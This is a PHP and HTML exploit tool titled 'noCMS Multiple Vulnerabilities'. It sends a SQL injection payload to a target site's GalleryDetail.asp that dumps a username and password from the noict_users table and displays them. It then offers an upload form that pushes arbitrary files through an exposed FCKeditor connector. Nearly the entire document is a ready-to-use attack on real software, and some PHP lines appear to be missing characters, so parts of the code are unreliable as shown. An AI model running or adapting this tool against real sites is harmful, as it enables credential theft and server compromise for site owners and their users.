<?php

function download($adress)
{
    
$curl curl_init();
    
curl_setopt($curlCURLOPT_URL$adress);  
    
curl_setopt($curlCURLOPT_RETURNTRANSFERtrue);
    
curl_setopt($curlCURLOPT_HEADER0); 
    
$html curl_exec($curl);
    
curl_close($curl); 
    return 
$html;
}

if (isset(
$_GET['add']))
{
    
$add $_GET['add'];
    
    
$exp_add $add."/GalleryDetail.asp?id=1%20or%201%3D%28CHAR%2866%29%2bCHAR%2882%29%2b%28select%20top%201%20user_username%2bCHAR%2847%29%2buser_password%20from%20noict_users%29%29--";
    
$html download($exp_add);
    
$text strrchr($html,"BR");
    
    
$pattern "#(?s)(?<=\BR).+?(?=\')#";
    
preg_match_all($pattern$text$m);

    

    
$up =$m[0][0];
    
$site_add $add;
    
$upload_add $add."/modir/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=Image&CurrentFolder=%2F";
}
?>

<!DOCTYPE html>
<html>
<head>
<title>noCMS Multiple Vulnerabilities</title> 
<style>
body {
background-color: black;
color: white;
}
</style>
<script>
var cnt = 0;
function inform()
{
cnt++;
if (cnt>1) alert("Upload complete");
}
</script>
</head>
<body>
<p align="center"><font size="6" color="white">noCMS Multiple Vulnerabilities</font></p>
<p><font size="4" color="white" >Sql Injection:</font></p>
<form name="input" action="" method="get">
<font size="3" color="white" >URL:</font><input type="text" name="add" value="<?php echo htmlspecialchars($add); ?>"></b>
<input type="submit" value="Submit">
</form>

<?php if (isset($_GET['add'])) { ?>
<p><font size="3" color="white" >Username and password </font></font></p>

<font size="3" color="white" >username/password: <?php echo $up?> </font><br/>


<p><font size="4" color="white"> FCK Editor: </font></p>
<iframe id="myframe" name="myframe" style="display:none" onload="inform();"></iframe>
<form enctype="multipart/form-data" action="<?php echo htmlspecialchars($upload_add); ?>" method="POST" target="myframe">
<p><font size="3" color="white">Browse for a file to upload</font></p>
<input type="file" name="NewFile" />
<input type="submit" value="Upload" />
</form>
<div id='uploadresult'></div>
<font size="3" color="white" >Your file add: </font><?php echo 'http://'.$upload_add.'/userfiles/image/'.$NewFile?> <br/>
<?php ?>

</body>
</html>